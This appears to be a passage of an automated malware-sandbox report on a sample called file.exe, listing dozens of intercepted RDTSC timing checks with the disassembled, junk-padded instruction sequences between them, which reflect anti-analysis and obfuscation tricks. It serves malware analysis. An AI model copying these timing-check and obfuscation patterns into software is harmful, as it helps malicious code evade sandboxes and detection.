Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6768D9 second address: 6768F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F40B477E786h 0x00000009 pop edx 0x0000000a jmp 00007F40B477E78Ah 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450387 second address: 5450399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450399 second address: 545039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545039F second address: 54503A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54503A3 second address: 5450421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F40B477E78Ch 0x00000013 jmp 00007F40B477E795h 0x00000018 popfd 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f jmp 00007F40B477E793h 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F40B477E794h 0x0000002e add ax, 0178h 0x00000033 jmp 00007F40B477E78Bh 0x00000038 popfd 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450421 second address: 5450468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F40B515FC04h 0x0000000a sbb ecx, 35419BD8h 0x00000010 jmp 00007F40B515FBFBh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov ecx, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F40B515FC05h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54803F0 second address: 548042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F40B477E791h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F40B477E78Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548042F second address: 5480493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 mov edi, ecx 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F40B515FC02h 0x00000019 push eax 0x0000001a jmp 00007F40B515FBFBh 0x0000001f nop 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F40B515FC02h 0x00000029 xor ch, FFFFFFA8h 0x0000002c jmp 00007F40B515FBFBh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480542 second address: 5480546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480546 second address: 548054C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548054C second address: 5480582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F40B477E794h 0x0000000b and ax, 9BB8h 0x00000010 jmp 00007F40B477E78Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480582 second address: 5480586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480586 second address: 548058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54805E1 second address: 54805EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C916h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54805EA second address: 548065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 pushad 0x0000000a mov si, di 0x0000000d pushfd 0x0000000e jmp 00007F40B477E795h 0x00000013 add ecx, 6E148A76h 0x00000019 jmp 00007F40B477E791h 0x0000001e popfd 0x0000001f popad 0x00000020 pop esi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F40B477E78Ch 0x00000028 add esi, 1BF01F98h 0x0000002e jmp 00007F40B477E78Bh 0x00000033 popfd 0x00000034 mov dl, cl 0x00000036 popad 0x00000037 leave 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F40B477E78Eh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548065B second address: 547005D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F40B515FBF7h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F40BA219033h 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F40B515FC03h 0x0000003b xor ecx, 6EAA7FAEh 0x00000041 jmp 00007F40B515FC09h 0x00000046 popfd 0x00000047 movzx ecx, bx 0x0000004a popad 0x0000004b push edx 0x0000004c jmp 00007F40B515FC08h 0x00000051 mov dword ptr [esp], ebp 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547005D second address: 5470061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470061 second address: 5470067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470067 second address: 547006D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547006D second address: 5470092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F40B515FC09h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470092 second address: 5470114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c push esi 0x0000000d pushfd 0x0000000e jmp 00007F40B477E793h 0x00000013 adc ah, FFFFFFDEh 0x00000016 jmp 00007F40B477E799h 0x0000001b popfd 0x0000001c pop eax 0x0000001d popad 0x0000001e push 0EE7BC56h 0x00000023 jmp 00007F40B477E798h 0x00000028 add dword ptr [esp], 66DEE1F2h 0x0000002f pushad 0x00000030 jmp 00007F40B477E78Eh 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470114 second address: 5470125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push 212B886Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470125 second address: 5470129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470129 second address: 547012F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547012F second address: 5470135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470135 second address: 5470139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470139 second address: 54701B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5495A302h 0x0000000f jmp 00007F40B477E792h 0x00000014 mov eax, dword ptr fs:[00000000h] 0x0000001a jmp 00007F40B477E790h 0x0000001f nop 0x00000020 pushad 0x00000021 jmp 00007F40B477E78Eh 0x00000026 push esi 0x00000027 movsx ebx, ax 0x0000002a pop esi 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 pushfd 0x00000033 jmp 00007F40B477E78Bh 0x00000038 adc ch, 0000006Eh 0x0000003b jmp 00007F40B477E799h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54701B6 second address: 54701F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F40B515FBFEh 0x0000000f sub esp, 18h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F40B515FC07h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54701F6 second address: 54702BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c mov bx, 163Eh 0x00000010 pop edi 0x00000011 jmp 00007F40B477E794h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F40B477E78Bh 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F40B477E794h 0x00000025 and ax, 4268h 0x0000002a jmp 00007F40B477E78Bh 0x0000002f popfd 0x00000030 call 00007F40B477E798h 0x00000035 mov si, F961h 0x00000039 pop eax 0x0000003a popad 0x0000003b push ebx 0x0000003c pushad 0x0000003d push esi 0x0000003e mov al, dl 0x00000040 pop ecx 0x00000041 pushfd 0x00000042 jmp 00007F40B477E791h 0x00000047 adc ecx, 2B6125E6h 0x0000004d jmp 00007F40B477E791h 0x00000052 popfd 0x00000053 popad 0x00000054 mov dword ptr [esp], esi 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702BC second address: 54702C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702C0 second address: 54702C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702C4 second address: 54702CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702CA second address: 54702D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702D0 second address: 54702D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702D4 second address: 54702D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54702D8 second address: 5470300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F40B515FC05h 0x00000011 pop ecx 0x00000012 mov edx, 7C5E9E94h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470300 second address: 5470306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470306 second address: 547030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547030A second address: 5470343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 1FFE8673h 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F40B477E792h 0x0000001a or ecx, 4159C978h 0x00000020 jmp 00007F40B477E78Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470343 second address: 54703C0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 5C6228AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [75C74538h] 0x0000000f jmp 00007F40B515FC01h 0x00000014 xor dword ptr [ebp-08h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F40B515FC03h 0x00000020 adc esi, 0AA3F69Eh 0x00000026 jmp 00007F40B515FC09h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F40B515FC00h 0x00000032 xor ax, A898h 0x00000037 jmp 00007F40B515FBFBh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54703C0 second address: 5470411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F40B477E794h 0x00000014 sbb cl, 00000028h 0x00000017 jmp 00007F40B477E78Bh 0x0000001c popfd 0x0000001d popad 0x0000001e nop 0x0000001f jmp 00007F40B477E796h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470411 second address: 547042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547042D second address: 5470433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470433 second address: 547044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov bx, 478Ah 0x0000000e movsx edx, ax 0x00000011 popad 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547044E second address: 547045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547045D second address: 5470475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470475 second address: 54704D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], eax 0x00000011 jmp 00007F40B477E796h 0x00000016 mov dword ptr [ebp-18h], esp 0x00000019 jmp 00007F40B477E790h 0x0000001e mov eax, dword ptr fs:[00000018h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F40B477E797h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54704D4 second address: 547050D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f jmp 00007F40B515FBFEh 0x00000014 test ecx, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547050D second address: 5470511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470511 second address: 5470515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470515 second address: 547051B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547051B second address: 5470520 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470520 second address: 5470526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470526 second address: 547053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jns 00007F40B515FC64h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, F96Ch 0x00000014 mov ax, dx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547053E second address: 54705F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F40B477E78Ch 0x00000009 sbb esi, 7D586F88h 0x0000000f jmp 00007F40B477E78Bh 0x00000014 popfd 0x00000015 mov di, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b add eax, ecx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F40B477E797h 0x00000024 and ax, 7C7Eh 0x00000029 jmp 00007F40B477E799h 0x0000002e popfd 0x0000002f popad 0x00000030 mov ecx, dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 push esi 0x00000035 pushfd 0x00000036 jmp 00007F40B477E793h 0x0000003b sbb ah, FFFFFF8Eh 0x0000003e jmp 00007F40B477E799h 0x00000043 popfd 0x00000044 pop ecx 0x00000045 mov dx, 6B84h 0x00000049 popad 0x0000004a test ecx, ecx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F40B477E796h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54705F7 second address: 54705FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54705FD second address: 5470601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546019A second address: 54601A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54601A0 second address: 546021D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F40B477E796h 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F40B477E791h 0x00000018 mov bx, cx 0x0000001b pop esi 0x0000001c pushfd 0x0000001d jmp 00007F40B477E78Dh 0x00000022 xor si, 85C6h 0x00000027 jmp 00007F40B477E791h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F40B477E78Dh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546021D second address: 5460223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460223 second address: 5460227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460227 second address: 5460295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007F40B515FBFBh 0x00000011 pop ecx 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 call 00007F40B515FC05h 0x0000001b pushfd 0x0000001c jmp 00007F40B515FC00h 0x00000021 and esi, 5C4FB328h 0x00000027 jmp 00007F40B515FBFBh 0x0000002c popfd 0x0000002d pop ecx 0x0000002e popad 0x0000002f sub esp, 2Ch 0x00000032 jmp 00007F40B515FBFFh 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460295 second address: 5460299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460361 second address: 5460365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460365 second address: 5460369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460369 second address: 546036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546036F second address: 5460383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E790h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460383 second address: 54603AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F40B515FC02h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604CC second address: 54604D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604D2 second address: 54604D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604D6 second address: 54604F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B477E795h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604F6 second address: 54604FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54604FC second address: 5460500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460545 second address: 5460549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460549 second address: 546054F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546054F second address: 5460555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460555 second address: 5460559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460559 second address: 546055D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
